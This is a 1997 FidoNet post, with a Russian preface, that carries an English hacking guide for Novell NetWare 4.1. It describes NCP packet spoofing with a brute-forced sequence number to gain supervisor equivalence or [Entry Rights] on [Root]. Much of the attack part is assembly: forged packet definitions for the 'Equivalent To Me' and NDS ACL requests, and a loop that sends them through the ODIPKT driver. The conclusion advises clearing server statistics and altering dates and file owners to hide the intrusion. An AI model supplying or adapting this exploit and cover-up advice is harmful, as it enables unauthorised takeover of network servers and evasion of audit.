_ RU.NETHACK (2:5077/15.22) _______________________________________ RU.NETHACK _
From : Eugene Ilchenko 2:5005/31.11 26 Dec 97 18:17:00
Subj : Томская атака
________________________________________________________________________________
Hi All!
Вот почти последний ваpиант нашего описания взлома.
Извините, что по английски, но последний pусский ваpиант я не нашел :(((
Этот-же файл можно найти по адpесу http://www.tsu.tu/~eugene/ -> NetWare
Hacking book -> How to hack Novell NetWare 4.11
Более детальное описание можете найти в 6-м номеpе LANMagazine, или по адpесу:
http://win.www.osp.ru/lan/lan_6_97/source/98.html
Впpочем, сюда-же есть ссылка и с моей стpанички.
Всего наилучшего в Hовом Году! :)
-------------------------------------------------------------------------------
HACKING NOVELL NETWARE 4.1
----------------------------------
Version 1.3
by Ilchenko Eugene and Gusev Igor
1997
Contents
Introduction
1.Exchange packets principle
2.The common idea of cracking
3.How to get Admin's rights
4.Consequences
Conclusion
Introduction
As you know everything can be broken and NOVELL NETWARE is not an
exeption. But the time for cracking something is defined by the time of
geting information about it. The more information you will find the more
easy it will be for you to crack.
In this documentation we'd like to tell you some sence about NOVELL
net and about cracking it.
This document is only for studying.In this document only the common
principles are discussed. If you still wonna hack you should know IPX
and NCP (netware core protocol) and think little for
yourself.
Excuse our English - it is not our first language. :)
1.Exchange packets principle.
First of all the server and workstations send packets to each other
accoding to the special protocol known as Netware Core Protocol ( NCP )
based on the IPX protocol. Every packet is sighed with its own number
from 0 to 255 stored in one byte. This field is known as Sequence
Number. Look at the packet structure.
ReceiverAddress 6 Normal The address of the workstation that
will recive the packet
SenderAddress 6 Normal The address of the workstation that
sends the packet
DataLength 2 High-Low The packet length
------------------------- IPX protocol header --------------------------
CheckSum 2 Normal The packet checksum.
IpxLength 2 High-Low The IPX packet length
HopCount 1 - Number of bridges to overcome
PacketType 1 - The packet type.
DestNetwork 4 Normal The destination subnet address
DestNode 6 Normal The destination workstation address
DestSocket 2 Low-High The destination programme socket
SourceNetwork 4 Normal The source subnet addres
SourceNode 6 Normal The source workstation address
SourceSocket 2 Low-High the source programme socket
------------------------- NCP protocol header --------------------------
RequestType 2 Low-High Depends on the request
SequenceNumber 1 - The number of the packet
ConectionNumberLow 1 - The conrction number.During the lo-
gin operation every station are as-
signed with the its own number
TaskNumber 1 - The task number. It is for worksta-
ion I guess. Never mind about it.
Just set it zero or whatever number
you like.
ConectionNumberHigh 1 - Always 0.
FunctionCode 1 - The function identificator.
-------------------------- NCP protocol data ---------------------------
- - - Depends on the requet type and the
function
The initiater is the workstation. It sends a requirement packet and
waits for an answer. The server receives the packet , check the station
address , the subnet address , the socket , the conection and the
sequence number. If something is wrong the server reject to accomplish
the requirement operation and send the answer.
2.The common idea of cracking.
As was said above the server checks all the packets it receives. But
if to form the packet like the other workstation, set its addresses in
the packet , set its connection number and so on and then to send it to
the net the server will never know whos request it has accomplished.The
main difficulty is the sequens number because others fields can be
obtained from the server with the usual functions. To make sure server
the server has accomplish the operation you should send the same packet
255 times with different sequens numbers.
3.How to get supervisor's rights
You can get supervisor's rights just having become supervisor
equvalent. There is a function known as EQUIVALENT TO ME that you
should send in name of supervisor. Look at the packet structure.
The packet structure with function EQUIVALENT TO ME
------------------------ Phisical packet header ------------------------
RecAdr db 00,20h,0afh,4fh,5fh,0ah
SndAdr db 00,20h,0afh,089h,022h,0afh
DataLength db 01,68h
-------------------------- IPX packet header ---------------------------
dw 0ffffh
IpxLength db 01,67h
db 0
db 17
DestNetwork db ?,?,?,?
DestNode db ?,?,?,?,?,?
DestSocket db 04,51h
SourceNetWork db 00,00,01,02
SourceNode db ?,?,?,?,?,?
SourceSocket db 40h,03
-------------------------- NCP packet header ---------------------------
db 22h,22h
SequenceNumber db 48
ConnectionNumberLow db 24
db 4
db 0
db 68h
db 2
--------------------------- NCP packet data ----------------------------
dd -1
dd 514
S1_2: dd offset S1_1 - offset S1_2-4
dd 0
dd 9
dd 0
dd 0
dd 0
S1ID db 67h,02h,00,06h
dd 1
dd 5
dd 34
db 'E',0,'q',0,'u',0,'i',0,'v',0,'a',0,'l',0,'e',0
db 'n',0,'t',0,' ',0,'T',0,'o',0,' ',0,'M',0,'e',0
dd 0
dd 1
dd 26
db '3',0,'1',0,'0',0,'7',0,'.',0,'I',0,'N',0,'F',0
db '.',0,'T',0,'S',0,'U',0
; !!! - two last strings - your full network name (like 3107.inf.tsu)
S1_1
The same packet but for NDS:
;Ethernet Level header-------------------------------------
RecAdr db -1,-1,-1,-1,-1,-1
SndAdr db 00,20h,0afh,089h,022h,0afh
DataLength db 00,0aeh-26
;IPX header------------------------------------------------
dw 0ffffh
IpxLength db 00,0aeh-26
db 0
db 17
DestNetwork db ?,?,?,? ;Internal network address of your
server
DestNode db 0,0,0,0,0,1 ;node of your server (as default)
DestSocket db 04,51h ;socket (dont change it)(NCP)
SourceNetWork db ?,?,?,? ; Your Administrator
SourceNode db ?,?,?,?,?,? ; Network
SourceSocket db ?,? ; Address
;NetWare Core Protocol level-------------------------------
db 22h,22h
SequenceNumber db 48 ; 255 - 0
ConnectionNumberLow db 24 ; Connection number of your main admin
db 4
db 0
db 68h
db 2
;NDS level-------------------------------------------------
dd -1
dd 514
So_2: dd offset So_1 - offset So_2+2 ; Message Length
dd 0
dd 9
dd 0
dd 0
dd 0
ID db ?,?,?,? ;ID of [Root] !!! found it and change
dd 1
dd 2
dd 8
db 'A',0,'C',0,'L',0,0,0
dd 1
So_3: dd So_1-So_3 ;ACL length
dd 30
db '[',0,'E',0,'n',0,'t',0,'r',0,'y',0,' ',0
db 'R',0,'i',0,'g',0,'h',0,'t',0,'s',0,']',0
dd 0
;----------------------------------------------------------
dd ?
;Length of your NDS name
So_1: db 100 dup (?)
; Your NDS name
To get supervisor's address,subnet,socket,ID,conection number you can
via the function Get Connection Information. Look below.
Get Connection Information
ah=E3h
ds:si=> ConReq
dw 2 - length
db 16h - subfunction
db ? - Conection Number
es:di=> ConRep
dw 62 - length
db 4 dup (?)
dw ? - User Type
db 56 duo (?) - User login name
int 21h
You can send the packet via IPX driver (function 9) but in this case
you have not access to the phisical packet header. I guess the server
does not check the sender address there.
You can also send the packet via LSL driver but it is too difficult.
The simplest way is to send the packet via ODIPKT driver (function 4).
Send Packet Via Odipkt
ah=4
cx=length
ds:si=>packet
int 60h
C=1 if error
The procedure of sending packets
Send proc
mov SequenceNumber,0
@@1: push ds
push es
mov ah,4
mov cx,Length
mov si,offset Packet
int 60h
pop es
pop ds
jc @@1
mov cx,1000
loop $-2
dec SequenceNumber
jne @@1
ret
Send endp
4.Consequences.
After answering a packet a server waits for another one with
incremented sequence number. If you try to squees your packet into the
work between the server and the workstation then there will appear the
dissequence of packets and the user will hang up. But you can avoid this
by sending 256*255 packets more.
Conclusion
If you realize the program accoding to this documentation you will
get big rights. I hope you will not harm anybody. Moreover,do not forget
that all what you do is fixed on the server.Clear off the server statis-
tic. Don't forget about dates and file owners.
Copyright 1997. by dISEr&_Igor_ (http://www.tsu.ru/~eugene/)
All comments, ideas, and questions send to eugene@tsu.ru
-------------------------------------------------------------------------------
E-Mail: eugene@tsu.ru; IRC - DALNet, nick - dISEr
Eugene.
---
* Origin: -> Я - не я и программа не моя :) <- (2:5005/31.11)